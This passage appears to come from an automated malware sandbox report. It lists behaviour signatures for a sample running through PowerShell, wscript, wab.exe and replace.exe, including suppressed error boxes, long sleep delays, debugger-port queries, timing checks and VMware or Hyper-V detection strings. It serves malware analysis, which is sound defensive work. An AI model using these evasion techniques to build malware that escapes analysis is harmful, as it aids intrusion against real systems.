        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EBD30 rdtscp 12_2_246EBD30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4487Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5386Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8424Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1321Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.3 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 8424 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 1321 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000003.1312114499.000001AAA32F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\ig
        Source: wab.exe, 0000000C.00000003.2155735479.0000000008A0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000002.00000002.2359893291.000002B3501AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EBD30 rdtscp 12_2_246EBD30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247035C0 NtCreateMutant,LdrInitializeThunk,12_2_247035C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479547F mov eax, dword ptr fs:[00000030h]12_2_2479547F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C1460 mov eax, dword ptr fs:[00000030h]12_2_246C1460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C1460 mov eax, dword ptr fs:[00000030h]12_2_246C1460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C1460 mov eax, dword ptr fs:[00000030h]12_2_246C1460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C1460 mov eax, dword ptr fs:[00000030h]12_2_246C1460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C1460 mov eax, dword ptr fs:[00000030h]12_2_246C1460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF460 mov eax, dword ptr fs:[00000030h]12_2_246DF460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF460 mov eax, dword ptr fs:[00000030h]12_2_246DF460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF460 mov eax, dword ptr fs:[00000030h]12_2_246DF460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF460 mov eax, dword ptr fs:[00000030h]12_2_246DF460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF460 mov eax, dword ptr fs:[00000030h]12_2_246DF460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF460 mov eax, dword ptr fs:[00000030h]12_2_246DF460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EA470 mov eax, dword ptr fs:[00000030h]12_2_246EA470
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EA470 mov eax, dword ptr fs:[00000030h]12_2_246EA470
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EA470 mov eax, dword ptr fs:[00000030h]12_2_246EA470
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F453 mov eax, dword ptr fs:[00000030h]12_2_2477F453
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB440 mov eax, dword ptr fs:[00000030h]12_2_246CB440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB440 mov eax, dword ptr fs:[00000030h]12_2_246CB440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB440 mov eax, dword ptr fs:[00000030h]12_2_246CB440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB440 mov eax, dword ptr fs:[00000030h]12_2_246CB440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB440 mov eax, dword ptr fs:[00000030h]12_2_246CB440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB440 mov eax, dword ptr fs:[00000030h]12_2_246CB440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]12_2_246FE443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]12_2_246FE443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]12_2_246FE443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]12_2_246FE443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]12_2_246FE443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]12_2_246FE443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]12_2_246FE443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]12_2_246FE443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E245A mov eax, dword ptr fs:[00000030h]12_2_246E245A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BE420 mov eax, dword ptr fs:[00000030h]12_2_246BE420
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BE420 mov eax, dword ptr fs:[00000030h]12_2_246BE420
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BE420 mov eax, dword ptr fs:[00000030h]12_2_246BE420
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BC427 mov eax, dword ptr fs:[00000030h]12_2_246BC427
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA430 mov eax, dword ptr fs:[00000030h]12_2_246FA430
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E340D mov eax, dword ptr fs:[00000030h]12_2_246E340D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F8402 mov eax, dword ptr fs:[00000030h]12_2_246F8402
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F8402 mov eax, dword ptr fs:[00000030h]12_2_246F8402
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F8402 mov eax, dword ptr fs:[00000030h]12_2_246F8402
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C04E5 mov ecx, dword ptr fs:[00000030h]12_2_246C04E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247694E0 mov eax, dword ptr fs:[00000030h]12_2_247694E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247954DB mov eax, dword ptr fs:[00000030h]12_2_247954DB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474A4B0 mov eax, dword ptr fs:[00000030h]12_2_2474A4B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C64AB mov eax, dword ptr fs:[00000030h]12_2_246C64AB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F34B0 mov eax, dword ptr fs:[00000030h]12_2_246F34B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F44B0 mov ecx, dword ptr fs:[00000030h]12_2_246F44B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C9486 mov eax, dword ptr fs:[00000030h]12_2_246C9486
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C9486 mov eax, dword ptr fs:[00000030h]12_2_246C9486
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB480 mov eax, dword ptr fs:[00000030h]12_2_246BB480
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F656A mov eax, dword ptr fs:[00000030h]12_2_246F656A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F656A mov eax, dword ptr fs:[00000030h]12_2_246F656A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F656A mov eax, dword ptr fs:[00000030h]12_2_246F656A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB562 mov eax, dword ptr fs:[00000030h]12_2_246BB562
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FB570 mov eax, dword ptr fs:[00000030h]12_2_246FB570
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FB570 mov eax, dword ptr fs:[00000030h]12_2_246FB570
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C8550 mov eax, dword ptr fs:[00000030h]12_2_246C8550
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C8550 mov eax, dword ptr fs:[00000030h]12_2_246C8550
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24795537 mov eax, dword ptr fs:[00000030h]12_2_24795537
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE53E mov eax, dword ptr fs:[00000030h]12_2_246EE53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE53E mov eax, dword ptr fs:[00000030h]12_2_246EE53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE53E mov eax, dword ptr fs:[00000030h]12_2_246EE53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE53E mov eax, dword ptr fs:[00000030h]12_2_246EE53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE53E mov eax, dword ptr fs:[00000030h]12_2_246EE53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476F525 mov eax, dword ptr fs:[00000030h]12_2_2476F525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476F525 mov eax, dword ptr fs:[00000030h]12_2_2476F525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476F525 mov eax, dword ptr fs:[00000030h]12_2_2476F525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476F525 mov eax, dword ptr fs:[00000030h]12_2_2476F525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476F525 mov eax, dword ptr fs:[00000030h]12_2_2476F525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476F525 mov eax, dword ptr fs:[00000030h]12_2_2476F525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476F525 mov eax, dword ptr fs:[00000030h]12_2_2476F525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0535 mov eax, dword ptr fs:[00000030h]12_2_246D0535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0535 mov eax, dword ptr fs:[00000030h]12_2_246D0535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0535 mov eax, dword ptr fs:[00000030h]12_2_246D0535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0535 mov eax, dword ptr fs:[00000030h]12_2_246D0535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0535 mov eax, dword ptr fs:[00000030h]12_2_246D0535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0535 mov eax, dword ptr fs:[00000030h]12_2_246D0535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477B52F mov eax, dword ptr fs:[00000030h]12_2_2477B52F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CD534 mov eax, dword ptr fs:[00000030h]12_2_246CD534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CD534 mov eax, dword ptr fs:[00000030h]12_2_246CD534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CD534 mov eax, dword ptr fs:[00000030h]12_2_246CD534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CD534 mov eax, dword ptr fs:[00000030h]12_2_246CD534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CD534 mov eax, dword ptr fs:[00000030h]12_2_246CD534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CD534 mov eax, dword ptr fs:[00000030h]12_2_246CD534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FD530 mov eax, dword ptr fs:[00000030h]12_2_246FD530
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FD530 mov eax, dword ptr fs:[00000030h]12_2_246FD530
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F7505 mov eax, dword ptr fs:[00000030h]12_2_246F7505
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F7505 mov ecx, dword ptr fs:[00000030h]12_2_246F7505
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24794500 mov eax, dword ptr fs:[00000030h]12_2_24794500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24794500 mov eax, dword ptr fs:[00000030h]12_2_24794500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24794500 mov eax, dword ptr fs:[00000030h]12_2_24794500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24794500 mov eax, dword ptr fs:[00000030h]12_2_24794500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24794500 mov eax, dword ptr fs:[00000030h]12_2_24794500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24794500 mov eax, dword ptr fs:[00000030h]12_2_24794500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24794500 mov eax, dword ptr fs:[00000030h]12_2_24794500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC5ED mov eax, dword ptr fs:[00000030h]12_2_246FC5ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC5ED mov eax, dword ptr fs:[00000030h]12_2_246FC5ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]12_2_246EE5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]12_2_246EE5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]12_2_246EE5E7
